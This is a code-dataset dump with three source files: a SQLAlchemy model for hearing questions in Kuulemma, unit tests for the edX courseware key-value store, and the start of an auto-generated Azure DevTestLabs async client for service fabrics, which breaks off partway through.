repo_name (string, 5-100 chars) | path (string, 4-299 chars) | copies (990 string classes) | size (string, 4-7 chars) | content (string, 666-1.03M chars) | license (15 string classes) | hash (int64) | line_mean (float64, 3.17-100) | line_max (int64, 7-1k) | alpha_frac (float64, 0.25-0.98) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
City-of-Helsinki/kuulemma | kuulemma/models/question.py | 2 | 3390 |
# -*- coding: utf-8 -*-
# Kuulemma
# Copyright (C) 2014, Fast Monkeys Oy
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from sqlalchemy.ext.orderinglist import ordering_list
from kuulemma.extensions import db
from .image import Image
from .text_item_mixin import TextItemMixin
class Question(db.Model, TextItemMixin):
"""
Implements a hearing question, modeled on a hearing alternative.
"""
__versioned__ = {}
__tablename__ = 'question'
id = db.Column(db.Integer, primary_key=True)
hearing_id = db.Column(
db.Integer,
db.ForeignKey(
'hearing.id',
ondelete='CASCADE'
)
)
main_image_id = db.Column(
db.Integer,
db.ForeignKey(
'image.id',
ondelete='CASCADE',
use_alter=True,
name='question_main_image_id_fkey'
)
)
main_image = db.relationship(
Image,
primaryjoin=main_image_id == Image.id,
post_update=True,
backref=db.backref('question_main', uselist=False)
)
images = db.relationship(
Image,
primaryjoin=id == Image.question_id,
cascade='all, delete-orphan',
passive_deletes=True,
order_by=Image.position,
collection_class=ordering_list('position'),
backref='question'
)
position = db.Column(db.Integer)
@property
def related_hearing(self):
from .hearing import Hearing
return Hearing.query.get(self.hearing_id)
@property
def letter(self):
ASCII_INDEX_OF_A = 65
position = self.position or 0
return chr(ASCII_INDEX_OF_A + position)
@property
def commentable_id(self):
return 'question-{id}'.format(id=self.id)
@property
def commentable_name(self):
return 'Kysymys {letter}'.format(letter=self.letter)
@property
def commentable_option(self):
"""
Returns an "id:name" string representation that can be used in the
frontend when commenting on this section.
"""
return '{id}:{name}'.format(
id=self.commentable_id,
name=self.commentable_name
)
def get_commentable_sections_string(self):
"""
Return the "id:name" pairs of all the commentable sections related to this
question, joined into a single semicolon-separated string.
"""
sections = []
sections.append(self.commentable_option)
if self.images:
if self.main_image:
sections.append(
self.main_image.commentable_option
)
for image in self.images:
sections.append(
image.commentable_option
)
return ';'.join(sections)
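# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example of how the commentable-section helpers above compose; the id
# value is hypothetical and the image entries depend on Image.commentable_option.
#
# question = Question(id=7, position=0)
# question.letter                               # 'A'   (chr(65 + 0))
# question.commentable_id                       # 'question-7'
# question.commentable_name                     # 'Kysymys A'
# question.commentable_option                   # 'question-7:Kysymys A'
# question.get_commentable_sections_string()    # 'question-7:Kysymys A' plus any
#                                               # image options, joined with ';'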
| agpl-3.0 | -1,828,551,257,976,780,800 | 27.487395 | 78 | 0.613274 | false |
andyzsf/edx | lms/djangoapps/courseware/tests/test_model_data.py | 4 | 15805 |
"""
Test for lms courseware app, module data (runtime data storage for XBlocks)
"""
import json
from mock import Mock, patch
from functools import partial
from courseware.model_data import DjangoKeyValueStore
from courseware.model_data import InvalidScopeError, FieldDataCache
from courseware.models import StudentModule
from courseware.models import XModuleStudentInfoField, XModuleStudentPrefsField
from student.tests.factories import UserFactory
from courseware.tests.factories import StudentModuleFactory as cmfStudentModuleFactory, location, course_id
from courseware.tests.factories import UserStateSummaryFactory
from courseware.tests.factories import StudentPrefsFactory, StudentInfoFactory
from xblock.fields import Scope, BlockScope, ScopeIds
from django.test import TestCase
from django.db import DatabaseError
from xblock.exceptions import KeyValueMultiSaveError
def mock_field(scope, name):
field = Mock()
field.scope = scope
field.name = name
return field
def mock_descriptor(fields=[]):
descriptor = Mock()
descriptor.scope_ids = ScopeIds('user1', 'mock_problem', location('def_id'), location('usage_id'))
descriptor.module_class.fields.values.return_value = fields
descriptor.fields.values.return_value = fields
descriptor.module_class.__name__ = 'MockProblemModule'
return descriptor
# The user ids here are 1 because we make a student in the setUp functions, and
# they get an id of 1. There's an assertion in setUp to ensure that assumption
# is still true.
user_state_summary_key = partial(DjangoKeyValueStore.Key, Scope.user_state_summary, None, location('usage_id'))
settings_key = partial(DjangoKeyValueStore.Key, Scope.settings, None, location('usage_id'))
user_state_key = partial(DjangoKeyValueStore.Key, Scope.user_state, 1, location('usage_id'))
prefs_key = partial(DjangoKeyValueStore.Key, Scope.preferences, 1, 'mock_problem')
user_info_key = partial(DjangoKeyValueStore.Key, Scope.user_info, 1, None)
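# Illustrative note (not part of the original module): each partial above pre-fills
# the scope, user id and block/usage portions of a DjangoKeyValueStore.Key, leaving
# only the field name for the tests to supply. For example:
#
# key = user_state_key('a_field')
# # is equivalent to:
# # DjangoKeyValueStore.Key(Scope.user_state, 1, location('usage_id'), 'a_field')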
class StudentModuleFactory(cmfStudentModuleFactory):
module_state_key = location('usage_id')
course_id = course_id
class TestInvalidScopes(TestCase):
def setUp(self):
self.user = UserFactory.create(username='user')
self.field_data_cache = FieldDataCache([mock_descriptor([mock_field(Scope.user_state, 'a_field')])], course_id, self.user)
self.kvs = DjangoKeyValueStore(self.field_data_cache)
def test_invalid_scopes(self):
for scope in (Scope(user=True, block=BlockScope.DEFINITION),
Scope(user=False, block=BlockScope.TYPE),
Scope(user=False, block=BlockScope.ALL)):
key = DjangoKeyValueStore.Key(scope, None, None, 'field')
self.assertRaises(InvalidScopeError, self.kvs.get, key)
self.assertRaises(InvalidScopeError, self.kvs.set, key, 'value')
self.assertRaises(InvalidScopeError, self.kvs.delete, key)
self.assertRaises(InvalidScopeError, self.kvs.has, key)
self.assertRaises(InvalidScopeError, self.kvs.set_many, {key: 'value'})
class OtherUserFailureTestMixin(object):
"""
Mixin class to add test cases for failures when the user trying to use the kvs is not
the one that instantiated the kvs.
Doing a mixin rather than modifying StorageTestBase (below) because some scopes don't
fail in this case, since they aren't bound to a particular user.
Assumes that this is mixed into a class that defines other_key_factory and existing_field_name.
"""
def test_other_user_kvs_get_failure(self):
"""
Test for assert failure when a user who didn't create the kvs tries to get from it
"""
with self.assertRaises(AssertionError):
self.kvs.get(self.other_key_factory(self.existing_field_name))
def test_other_user_kvs_set_failure(self):
"""
Test for assert failure when a user who didn't create the kvs tries to set a value in it
"""
with self.assertRaises(AssertionError):
self.kvs.set(self.other_key_factory(self.existing_field_name), "new_value")
class TestStudentModuleStorage(OtherUserFailureTestMixin, TestCase):
"""Tests for user_state storage via StudentModule"""
other_key_factory = partial(DjangoKeyValueStore.Key, Scope.user_state, 2, location('usage_id')) # user_id=2, not 1
existing_field_name = "a_field"
def setUp(self):
student_module = StudentModuleFactory(state=json.dumps({'a_field': 'a_value', 'b_field': 'b_value'}))
self.user = student_module.student
self.assertEqual(self.user.id, 1) # check our assumption hard-coded in the key functions above.
self.field_data_cache = FieldDataCache([mock_descriptor([mock_field(Scope.user_state, 'a_field')])], course_id, self.user)
self.kvs = DjangoKeyValueStore(self.field_data_cache)
def test_get_existing_field(self):
"Test that getting an existing field in an existing StudentModule works"
self.assertEquals('a_value', self.kvs.get(user_state_key('a_field')))
def test_get_missing_field(self):
"Test that getting a missing field from an existing StudentModule raises a KeyError"
self.assertRaises(KeyError, self.kvs.get, user_state_key('not_a_field'))
def test_set_existing_field(self):
"Test that setting an existing user_state field changes the value"
self.kvs.set(user_state_key('a_field'), 'new_value')
self.assertEquals(1, StudentModule.objects.all().count())
self.assertEquals({'b_field': 'b_value', 'a_field': 'new_value'}, json.loads(StudentModule.objects.all()[0].state))
def test_set_missing_field(self):
"Test that setting a new user_state field changes the value"
self.kvs.set(user_state_key('not_a_field'), 'new_value')
self.assertEquals(1, StudentModule.objects.all().count())
self.assertEquals({'b_field': 'b_value', 'a_field': 'a_value', 'not_a_field': 'new_value'}, json.loads(StudentModule.objects.all()[0].state))
def test_delete_existing_field(self):
"Test that deleting an existing field removes it from the StudentModule"
self.kvs.delete(user_state_key('a_field'))
self.assertEquals(1, StudentModule.objects.all().count())
self.assertRaises(KeyError, self.kvs.get, user_state_key('not_a_field'))
def test_delete_missing_field(self):
"Test that deleting a missing field from an existing StudentModule raises a KeyError"
self.assertRaises(KeyError, self.kvs.delete, user_state_key('not_a_field'))
self.assertEquals(1, StudentModule.objects.all().count())
self.assertEquals({'b_field': 'b_value', 'a_field': 'a_value'}, json.loads(StudentModule.objects.all()[0].state))
def test_has_existing_field(self):
"Test that `has` returns True for existing fields in StudentModules"
self.assertTrue(self.kvs.has(user_state_key('a_field')))
def test_has_missing_field(self):
"Test that `has` returns False for missing fields in StudentModule"
self.assertFalse(self.kvs.has(user_state_key('not_a_field')))
def construct_kv_dict(self):
"""Construct a kv_dict that can be passed to set_many"""
key1 = user_state_key('field_a')
key2 = user_state_key('field_b')
new_value = 'new value'
newer_value = 'newer value'
return {key1: new_value, key2: newer_value}
def test_set_many(self):
"Test setting many fields that are scoped to Scope.user_state"
kv_dict = self.construct_kv_dict()
self.kvs.set_many(kv_dict)
for key in kv_dict:
self.assertEquals(self.kvs.get(key), kv_dict[key])
def test_set_many_failure(self):
"Test failures when setting many fields that are scoped to Scope.user_state"
kv_dict = self.construct_kv_dict()
# because we're patching the underlying save, we need to ensure the
# fields are in the cache
for key in kv_dict:
self.kvs.set(key, 'test_value')
with patch('django.db.models.Model.save', side_effect=DatabaseError):
with self.assertRaises(KeyValueMultiSaveError) as exception_context:
self.kvs.set_many(kv_dict)
self.assertEquals(len(exception_context.exception.saved_field_names), 0)
class TestMissingStudentModule(TestCase):
def setUp(self):
self.user = UserFactory.create(username='user')
self.assertEqual(self.user.id, 1) # check our assumption hard-coded in the key functions above.
self.field_data_cache = FieldDataCache([mock_descriptor()], course_id, self.user)
self.kvs = DjangoKeyValueStore(self.field_data_cache)
def test_get_field_from_missing_student_module(self):
"Test that getting a field from a missing StudentModule raises a KeyError"
self.assertRaises(KeyError, self.kvs.get, user_state_key('a_field'))
def test_set_field_in_missing_student_module(self):
"Test that setting a field in a missing StudentModule creates the student module"
self.assertEquals(0, len(self.field_data_cache.cache))
self.assertEquals(0, StudentModule.objects.all().count())
self.kvs.set(user_state_key('a_field'), 'a_value')
self.assertEquals(1, len(self.field_data_cache.cache))
self.assertEquals(1, StudentModule.objects.all().count())
student_module = StudentModule.objects.all()[0]
self.assertEquals({'a_field': 'a_value'}, json.loads(student_module.state))
self.assertEquals(self.user, student_module.student)
self.assertEquals(location('usage_id').replace(run=None), student_module.module_state_key)
self.assertEquals(course_id, student_module.course_id)
def test_delete_field_from_missing_student_module(self):
"Test that deleting a field from a missing StudentModule raises a KeyError"
self.assertRaises(KeyError, self.kvs.delete, user_state_key('a_field'))
def test_has_field_for_missing_student_module(self):
"Test that `has` returns False for missing StudentModules"
self.assertFalse(self.kvs.has(user_state_key('a_field')))
class StorageTestBase(object):
"""
A base class that gets subclassed when testing each of the scopes.
"""
# Disable pylint warnings that arise because of the way the child classes call
# this base class -- pylint's static analysis can't keep up with it.
# pylint: disable=no-member, not-callable
factory = None
scope = None
key_factory = None
storage_class = None
def setUp(self):
field_storage = self.factory.create()
if hasattr(field_storage, 'student'):
self.user = field_storage.student
else:
self.user = UserFactory.create()
self.mock_descriptor = mock_descriptor([
mock_field(self.scope, 'existing_field'),
mock_field(self.scope, 'other_existing_field')])
self.field_data_cache = FieldDataCache([self.mock_descriptor], course_id, self.user)
self.kvs = DjangoKeyValueStore(self.field_data_cache)
def test_set_and_get_existing_field(self):
self.kvs.set(self.key_factory('existing_field'), 'test_value')
self.assertEquals('test_value', self.kvs.get(self.key_factory('existing_field')))
def test_get_existing_field(self):
"Test that getting an existing field in an existing Storage Field works"
self.assertEquals('old_value', self.kvs.get(self.key_factory('existing_field')))
def test_get_missing_field(self):
"Test that getting a missing field from an existing Storage Field raises a KeyError"
self.assertRaises(KeyError, self.kvs.get, self.key_factory('missing_field'))
def test_set_existing_field(self):
"Test that setting an existing field changes the value"
self.kvs.set(self.key_factory('existing_field'), 'new_value')
self.assertEquals(1, self.storage_class.objects.all().count())
self.assertEquals('new_value', json.loads(self.storage_class.objects.all()[0].value))
def test_set_missing_field(self):
"Test that setting a new field changes the value"
self.kvs.set(self.key_factory('missing_field'), 'new_value')
self.assertEquals(2, self.storage_class.objects.all().count())
self.assertEquals('old_value', json.loads(self.storage_class.objects.get(field_name='existing_field').value))
self.assertEquals('new_value', json.loads(self.storage_class.objects.get(field_name='missing_field').value))
def test_delete_existing_field(self):
"Test that deleting an existing field removes it"
self.kvs.delete(self.key_factory('existing_field'))
self.assertEquals(0, self.storage_class.objects.all().count())
def test_delete_missing_field(self):
"Test that deleting a missing field from an existing Storage Field raises a KeyError"
self.assertRaises(KeyError, self.kvs.delete, self.key_factory('missing_field'))
self.assertEquals(1, self.storage_class.objects.all().count())
def test_has_existing_field(self):
"Test that `has` returns True for an existing Storage Field"
self.assertTrue(self.kvs.has(self.key_factory('existing_field')))
def test_has_missing_field(self):
"Test that `has` returns False for a missing Storage Field"
self.assertFalse(self.kvs.has(self.key_factory('missing_field')))
def construct_kv_dict(self):
"""Construct a kv_dict that can be passed to set_many"""
key1 = self.key_factory('existing_field')
key2 = self.key_factory('other_existing_field')
new_value = 'new value'
newer_value = 'newer value'
return {key1: new_value, key2: newer_value}
def test_set_many(self):
"""Test that setting many regular fields at the same time works"""
kv_dict = self.construct_kv_dict()
self.kvs.set_many(kv_dict)
for key in kv_dict:
self.assertEquals(self.kvs.get(key), kv_dict[key])
def test_set_many_failure(self):
"""Test that a DB error part-way through setting many regular fields reports the fields saved before the failure"""
kv_dict = self.construct_kv_dict()
for key in kv_dict:
self.kvs.set(key, 'test value')
with patch('django.db.models.Model.save', side_effect=[None, DatabaseError]):
with self.assertRaises(KeyValueMultiSaveError) as exception_context:
self.kvs.set_many(kv_dict)
exception = exception_context.exception
self.assertEquals(len(exception.saved_field_names), 1)
self.assertEquals(exception.saved_field_names[0], 'existing_field')
class TestUserStateSummaryStorage(StorageTestBase, TestCase):
"""Tests for UserStateSummaryStorage"""
factory = UserStateSummaryFactory
scope = Scope.user_state_summary
key_factory = user_state_summary_key
storage_class = factory.FACTORY_FOR
class TestStudentPrefsStorage(OtherUserFailureTestMixin, StorageTestBase, TestCase):
"""Tests for StudentPrefStorage"""
factory = StudentPrefsFactory
scope = Scope.preferences
key_factory = prefs_key
storage_class = XModuleStudentPrefsField
other_key_factory = partial(DjangoKeyValueStore.Key, Scope.preferences, 2, 'mock_problem') # user_id=2, not 1
existing_field_name = "existing_field"
class TestStudentInfoStorage(OtherUserFailureTestMixin, StorageTestBase, TestCase):
"""Tests for StudentInfoStorage"""
factory = StudentInfoFactory
scope = Scope.user_info
key_factory = user_info_key
storage_class = XModuleStudentInfoField
other_key_factory = partial(DjangoKeyValueStore.Key, Scope.user_info, 2, 'mock_problem') # user_id=2, not 1
existing_field_name = "existing_field"
| agpl-3.0 | -2,841,379,221,693,809,700 | 45.485294 | 149 | 0.691933 | false |
Azure/azure-sdk-for-python | sdk/devtestlabs/azure-mgmt-devtestlabs/azure/mgmt/devtestlabs/aio/operations/_service_fabrics_operations.py | 1 | 41637 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ServiceFabricsOperations:
"""ServiceFabricsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.devtestlabs.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
expand: Optional[str] = None,
filter: Optional[str] = None,
top: Optional[int] = None,
orderby: Optional[str] = None,
**kwargs
) -> AsyncIterable["_models.ServiceFabricList"]:
"""List service fabrics in a given user profile.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param expand: Specify the $expand query. Example: 'properties($expand=applicableSchedule)'.
:type expand: str
:param filter: The filter to apply to the operation. Example: '$filter=contains(name,'myName')'.
:type filter: str
:param top: The maximum number of resources to return from the operation. Example: '$top=10'.
:type top: int
:param orderby: The ordering expression for the results, using OData notation. Example:
'$orderby=name desc'.
:type orderby: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ServiceFabricList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.devtestlabs.models.ServiceFabricList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ServiceFabricList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ServiceFabricList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics'} # type: ignore
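# Illustrative usage sketch (not part of the generated client): the AsyncItemPaged
# returned by list() is consumed with "async for"; the client variable below is an
# assumption for the example.
#
# async for fabric in client.service_fabrics.list(resource_group_name, lab_name, user_name):
#     print(fabric.name)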
async def get(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
expand: Optional[str] = None,
**kwargs
) -> "_models.ServiceFabric":
"""Get service fabric.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:param expand: Specify the $expand query. Example: 'properties($expand=applicableSchedule)'.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ServiceFabric, or the result of cls(response)
:rtype: ~azure.mgmt.devtestlabs.models.ServiceFabric
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ServiceFabric"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ServiceFabric', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
service_fabric: "_models.ServiceFabric",
**kwargs
) -> "_models.ServiceFabric":
cls = kwargs.pop('cls', None) # type: ClsType["_models.ServiceFabric"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(service_fabric, 'ServiceFabric')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ServiceFabric', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ServiceFabric', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
service_fabric: "_models.ServiceFabric",
**kwargs
) -> AsyncLROPoller["_models.ServiceFabric"]:
"""Create or replace an existing service fabric. This operation can take a while to complete.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:param service_fabric: A Service Fabric.
:type service_fabric: ~azure.mgmt.devtestlabs.models.ServiceFabric
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either ServiceFabric or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.devtestlabs.models.ServiceFabric]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ServiceFabric"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
lab_name=lab_name,
user_name=user_name,
name=name,
service_fabric=service_fabric,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ServiceFabric', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Delete service fabric. This operation can take a while to complete.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
